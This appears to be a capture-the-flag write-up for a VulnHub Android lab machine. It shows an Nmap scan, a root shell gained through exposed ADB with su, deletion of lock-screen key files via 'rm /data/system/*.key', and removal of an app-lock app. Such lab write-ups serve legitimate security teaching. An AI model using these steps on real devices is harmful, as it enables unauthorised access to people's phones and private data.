I started the enumeration by running a port scan with Nmap, checking default scripts.
root@kali:~# nmap -sC -sV -oN nmap/initial 192.168.1.9 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.1.9 Host is up (0.00018s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 5555/tcp open freeciv? 8080/tcp open http PHP cli server 5.5 or later |_http-title: Welcome To UnderGround Sector MAC Address: 08:00:27:B3:57:0D (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.06 seconds
Port 8080 was running a php webserver. Looking at it in the browser, there was some information but it was not clear.
I started a gobuster scan in the background but that didn’t give me any interesting directory. Then I moved to the next port 5555 for further enumeration. For connecting to this port you need to install adb. You can install it by using the following command:
$ sudo apt install adb
After installing, we can connect the target machine to adb by using the adb connect command followed by the IP of the machine and we can also see the connected devices using adb devices command.
root@kali:~# adb connect 192.168.1.9 connected to 192.168.1.9:5555 root@kali:~/Documents/vulnhub/investigator# adb devices List of devices attached 192.168.1.9:5555 device
Once the device is connected, we can open a shell on the target machine via adb using adb shell command. We can then pivot to root using su.
root@kali:~# adb shell uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) @x86:/ $ su uid=0(root) gid=0(root)@x86:/ #
Now we can read our first flag present in the home directory.
uid=0(root) gid=0(root)@x86:/ # cd /data/root/ uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt Great Move !!! Itz a easy one right ??? lets make this one lil hard You flag is not here !!! Agent "S" Your Secret Key ---------------->259148637
Next, I tried to use the android machine manually, The machine displays a lock screen and asks us to enter a pin. I tried entering the pin 6666666666 and 259148637 but none of them worked.
We can bypass this login screen using adb. For this we need to delete the login key present in the system directory.
uid=0(root) gid=0(root)@x86:/data/root # rm /data/system/*.key uid=0(root) gid=0(root)@x86:/data/root # exit
Now when you restart the machine, the login screen does not appear. We can now access all apps inside the phone, but most of them are still protected by a third party app lock.
We need to use adb again to remove this app. Use the adb uninstall command followed by the app name to uninstall any app. In this case, I’ll be removing the app lock.
root@kali:~# adb uninstall com.martianmode.applock
Once the app lock is uninstalled, restart the machine, Now it will not ask for any password and we can read the final flag in the Messages App.
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by wuzx.